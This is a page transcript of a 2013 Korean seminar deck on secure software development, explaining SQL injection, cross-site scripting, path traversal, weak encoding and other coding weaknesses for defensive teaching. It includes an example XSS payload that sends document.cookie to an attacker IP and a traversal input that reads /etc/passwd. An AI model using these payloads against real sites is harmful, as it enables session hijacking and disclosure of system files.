소프트웨어 개발보안 설명 및 예시 ‘2013. 2. 20(수) 22:00 22-2기 배주진.

Slides:



Advertisements
Similar presentations
제주특별자치도교육청. 목 차 일상생활 속에서의 정보보안 안전한 컴퓨터 사용  보안업데이트 자동설정  가짜 백신 프로그램 주의  믿을 수 있는 웹사이트만 접속  자동 로그인 기능 사용 안함  사용 후 반드시 로그아웃 확인 
Advertisements

ITQ 시험 가이드 2005 년 신 출제기준에 따른 한국생산성본부 검정사업센터. ITQ 시험 가이드 2 목차 개요 개요 ITQ 시험과목 및 선택 S/W ITQ 시험과목 및 선택 S/W ITQ 시험 과목별 가이드 ITQ 시험 과목별 가이드 아래한글 /MS 워드 아래한글.
의료자원 규제현황과 개선방향 자원평가실. 의료자원 관리 개요 규제개혁 토론과제.
1 Push 알림서비스 시나리오 및 시스템 구축방안 Push 알림서비스 시나리오 및 시스템 구축방안 IBK 기업은행 신채널제휴팀 붙임 4.
2 Ⅰ Ⅱ Ⅲ 3 Ⅰ 4 1. 추진배경 2. 사업의 정의 3. 사업의 범위 4. 개선방향.
① 인터넷우체국 ( 을 통한 검색 새 우편번호 검색방법 ( 인터넷 ) O 다음, 네이버 등 포털서비스와 동일한 통합검색 방식 - 도로명주소, 지번주소, 건물명 등을 입력하여 검색 가능 예시 ) 도움 5 로, 어진동, 우정사업본부.
KT Managed ICT KT Managed ICT. 우편물 반송정보제공서비스 SSL VPN 정보보호 구축 제안서 1. SSL VPN 암호화 통신 제안 ( 요약 ) 2. SSL VPN 암호화 통신 구축 비용 3. 국가정보원 IT 보안 인증서 반송정보분석센터 이포스팅㈜
Bizbill 무료전자세금계산서 사용자 메뉴얼.
(4) 우리 나라의 이상과 목표 2. 국가의 중요성과 국가 발전 중학교 2학년 도덕
개인정보보호 공공기관에서의 개인정보보호 본 자료는 개인정보보호를 위한 교육용 자료로 활용 가능 합니다
개인정보 암호화 법령 현황 - 개인정보 유출 소송 사례와 대응 방안 -
목차 일모아시스템 시연 및 참고자료 일모아시스템 관련 법/제도/지침 개인정보보호 관련 유의사항 자주묻는질문
5급 승진 후보자 기획보고서 역량평가 대비 교육 안내 (대학교/교육청/중앙부처/지자체 등) 역량평가아카데미 2014년 5급승진을 위한 역량평가 대비를 위해서 다음과 같이 “기획보고서 교육”을 실시하오니 상담후 신청 바랍니다. 모든 기관의 공통 역량평가사항인 “ 사례제시형.
연 합 남 전 도 회 월 례 회 1부 예배- 찬 송 장 다같이 2011년 1월 2일 1부 예배- 찬 송 장 다같이 기 도
사 업 계 획 2011년 제1호 - 2월 1일 2011 주 안에서 소통하며 화합하고 참여하며 헌신하는 남신도회
국가도서관통계시스템 수치입력자 매뉴얼 이의신청 방법 Version. 1.0.
감독관 사용설명서 프로메트릭 코리아 유한회사 Version 1.1.
SW업체 업무설명회 자료 2007년 행정업무용 S/W 구매 조달청 (정보기술용역팀)
안전진단 대상 설비 및 시설 선정 기준 안전진단 대상 설비 선정 기준
1. 근접경호의 개념 경호대상의 신변을 보호하기 위하여 지근거리에서 실시하는 호위활동을 말하며 경호행위의 마지막 보루이다.
프로그램 사용 안내서 프로그램명 : 멤버북.
효과적인 DB암호화 구축을 위한 애슬론 v1.5 제안
뇌를 자극하는 SQL Server 장. 서버 자동화.
출처 : ebiznote.com 사업관리 개발관리 개발서버(문서함) 산출물 관리대장 컨텐츠 DB DB 개발서버(작업관리)
Right Now 담당 교수 : 문양세 교수님 팀 원 : 김원모(팀장) 우덕령, 김승선, 김종원, 문경민
제주닷컴 매뉴얼 (실시간 예약시스템) 2013년 10월.
전자출결시스템 스마트폰 사용 매뉴얼 [ 학 생 용 ].
교육과정과 주요업무.
1. 하나투어 프로모션 페이지 수정사항 정리 – 리오타노 이태리 세미극세사 차렵이불_그레이
개인정보 유출 및 그에 따른 책임 확대 개인 정보 데이터 유출사례 점점 증가 데이터 유출에 따른 기업의 책임 확대
정보보호 신규 업무담당자 교육. 정보보호 신규 업무담당자 교육 시 간 교육내용 비 고 ~ 13:00 ■ 교육 등록 13:00 ~ 13:10 ■ 개회 및 인사 말씀 13:10 ~ 14:40 ■ 개인정보보호 ‧ 개인정보보호 유‧노출 사례 ‧ 개인정보보호 기본 개념 및.
경상남도 해외마케팅 사업지원 시스템 사용자 매뉴얼.
Database 중고차 매매 DB 비즈니스IT 윤동섭.
매스커뮤니케이션 신문 목원대학교 서 진 희.
기존 REC거래시스템 회원사의 신재생 통합포털 회원가입 설명서.
모두가 행복한 교육, 미래를 여는 창의인재 2015 개정교육과정 서울숭인초등학교 교사 이소정.
한국산업기술평가원 사업비카드제안내 (산업기술기반조성사업)
Computer Network(Hacking)
환경관리 규정 - 목 차 – 1.적 용 범 위 9.환경관리 교육 2.목 적 10.환경 점검
2013학년도 1학기 강의 성적 입력 안내 UST 교무팀
상가개폐업조사용 앱 사용설명서 - android기준 - 소상공인진흥원 2013년 하반기 조사.
국가문화예술지원시스템 사용자 매뉴얼(1)
제안 목적 고객성향 분석으로 매출 증대 유사업체 분석으로 신상품 홍보 원가요소 분석 및 피드백으로 원가율 관리
광고센터 완전정복 매뉴얼 ( ).
청각기관의 구조와 기능2 옥정달.
API Multi Blogger 설명서
비담 MOS 시뮬레이션 사용 절차 1 – 개별 사용 유형
3D 프린팅 프로그래밍 04 – 도형 회전 (하트 열쇠고리 만들기) 강사: 김영준 목원대학교 겸임교수.
2013년도 상반기 고객만족도 조사 결과 보고서
2013년도 하반기 고객만족도 조사 결과 보고서
1. 기술 및 제품 설명 > 제품 개요 발표자료 작성 방법 <발표자료 작성 방법>
거래처 매뉴얼 리 얼 시 스 템 주 식 회 사.
12장. 침해사고 조사 절차.
자료정제 사용자 교육 (교무업무 부문) 차세대 나이스 구축을 위한 장소: 광주광역시교육과학연구원 대강당 일정
1학년 신입생 학부모교실 안내사항 2019년 3월 6일 1학년부장 김희선.
PDA 솔루션 사용전에 반드시 본 설명서를 읽어보세요.
이미지 지금 아니면 언제 사용하지? 소멸알림톡 페이지 여행은 이거 하나면 돼! 없는 거 빼곤 다 있다!
APPLICATION 서비스신청 클릭.
매물장 로그인 직원을 미리 생성하시면 직원 ID로 로그인 가능.
거래처 매뉴얼 리 얼 시 스 템 주 식 회 사.
1. 전문대학기초학습지원센터 접속하기 전문대학 기초학습지원센터 접속 접속URL : LOG-IN 클릭.
1. 전문대학기초학습지원센터 접속하기 전문대학 기초학습지원센터 접속 접속URL : LOG-IN 클릭.
1. 전문대학기초학습지원센터 접속하기 전문대학 기초학습지원센터 접속 접속URL : LOG-IN 클릭.
일반대학원 사용자 매뉴얼(학생)
코 칭 결 과 센 터 구성센터 (모바일) 코칭대상 프로 (엔지니어) 코칭일시
1. 하나투어 프로모션 페이지 수정사항 정리 – 인따르시아 여행용 파우치 5p (핑크)
1. 하나투어 프로모션 페이지 수정사항 정리 – [트래블이지] 비비드접이식가방 NO.1278
차세대 응급의료정보망 구축 4차 사업 통합로그인 이용메뉴얼 v1.1.
SW업체 업무설명회 자료 2008년 행정업무용 S/W 구매 조달청 (정보기술팀)
관리자 페이지에서 관리자 승인 1. 정기권 신규고객 1. 로그인 화면 2. 차량등록여부 확인 3. 개인정보 활용 동의
Presentation transcript:

소프트웨어 개발보안 설명 및 예시 ‘2013. 2. 20(수) 22:00 22-2기 배주진

개요 본인 소개 소프트웨어 개발보안 정의 및 세 미나 목적 소프트웨어 개발보안이 “왜?” 필 요한가 입력데이터 검증 및 표현 보안기능 시간 및 상태 API 오용 질의 응답

본인 소개 이름 : 배주진 나이 : 26살(88년생) 22-2기 멤버십 회원 건국대학교 07학번(3학년 복학예정) 수원 거주! 여행을 좋아하며, 활동적임!!

소프트웨어 개발보안 정의 및 세미나 목적 ‘소프트웨어 개발보안’의 정의  SW 개발과정에서 개발자 실수, 논리적 오류 등으로 인해 SW에 내포될 수 있 는 보안취약점의 원인을 최소화 하는 행위  사이버 보안위협에 대응할 수 있는 안전한 SW를 개발하기 위한 일련의 보 안 활동 세미나 목적  소프트웨어 개발보안을 이해하여, 보안약점이 최소화된 소스 코딩  잘 알려진 보안약점 뿐만 아니라, 추후에 발생할 수 있는 보안약점 예방

소프트웨어 개발보안이 “왜?” 필요한가 정보 시스템을 구축 할 경우, 취약점 발생 빈도를 보면 APPLICATION단에서 75% 기존 보안장비(f/w,IPS,보안패치)에서 25%가 있다. 따라서 개발보안을 적용시킬경우, 최소한의 보안장비를 구입 할 수 있어 개발보안만으로 최대 10배 가량의 비용 절감 효과가 있음. ‘12. 6월 행안부가 발표한 ‘정보시스템 구축/운영 지침(행안부고시 제2012-25호)’ 에 따라, 전자정부 관련 정보화사업 수행시 소프트웨어 개발보안을 의무화 하였음. 따라서 전자정보 관련 사업을 하거나, 공공기관 외주를 얻기위해 소프 트웨어 개발보안을 배우고 이해 하여야됨.

입력데이터 검증 및 표현 SQL 삽입  데이터베이스와 연동된 웹 어플리케이션에서 입력된 데이터에 대한 유효 성 검증을 하지 않을 경우, 공격자가 입력 폼 및 URL 입력란에 SQL 문을 삽입하여 DB로 부터 정보를 열 람하거나 조작할 수 있는 취약점을 말함.

입력데이터 검증 및 표현 SQL 삽입

입력데이터 검증 및 표현 크로스사이트 스크립트 검증되지 않은 외부 입력이 동적 웹페이지 생성에 사용될 경우, 동적 웹페이지 를 열람하는 접속자의 권한으로 부적절한 스크립트가 수행되어 정보유출 등 공격 방식. 예) <script>window.open("http://192.168.0.7/GetUsercookie.php?data="+document.cookie, "small", 'width=150, height=220')</script>

입력데이터 검증 및 표현 상대 디렉터리 경로 조작 외부 입력을 통하여 디렉터리 경로 문자열을 생성하는 경우, 결과 디렉터리가 제한된 디렉터리여야할때, 악의적인 외부입력을 제대로 변환시키지 않으면 예상 밖 영역의 경로 문자열 이 생성될 수 있음. 예) reportName이 ../../../../../../../etc/passwd와 같이 입력될경우 악의적인 사용자가 시스템의 ID 탈취 가능

입력데이터 검증 및 표현 상대 디렉터리 경로 조작

보안기능 취약한 암호화 알고리즘 사용 간단한 인코딩 함수 base64와 같은 지나치게 간단한 인코딩 함수를 사용하 지 않고, 3-DES, AES와 같은 암호화 알고리즘을 사용해야 된다. 자신만의 암호화 알고리즘을 개발하는 것은 위험하며, 학계 및 업계에서 이 미 검증된 표준화된 알고리즘을 사용

보안기능 주석문안에 포함된 패스워드 등 시스템 주요정보 패스워드를 주석문에 넣어두면 시스템 보안에 치명적일 수 있으므로 제거 필요.

시간 및 상태 제대로 제어되지 않은 재귀함수 호출  재귀의 순환횟수를 제어하지 못하여 할당된 메모리나 프로그램 스택 등의 자원을 과다하게 사용하면 해당 시스템이 자원고갈이 발생할 수 있으므로 일정시간안에 결과가 도출되지 않을경우 강제 종료를 해야한다.

시간 및 상태 제대로 제어되지 않은 재귀함수 호출  재귀의 순환횟수를 제어하지 못하여 할당된 메모리나 프로그램 스택 등의 자원을 과다하게 사용하면 해당 시스템이 자원고갈이 발생할 수 있으므로 일정시간안에 결과가 도출되지 않을경우 강제 종료를 해야한다.

API 오용 DNS lookup에 의존한 보안결정

API 오용 DNS lookup에 의존한 보안결정

질의 응답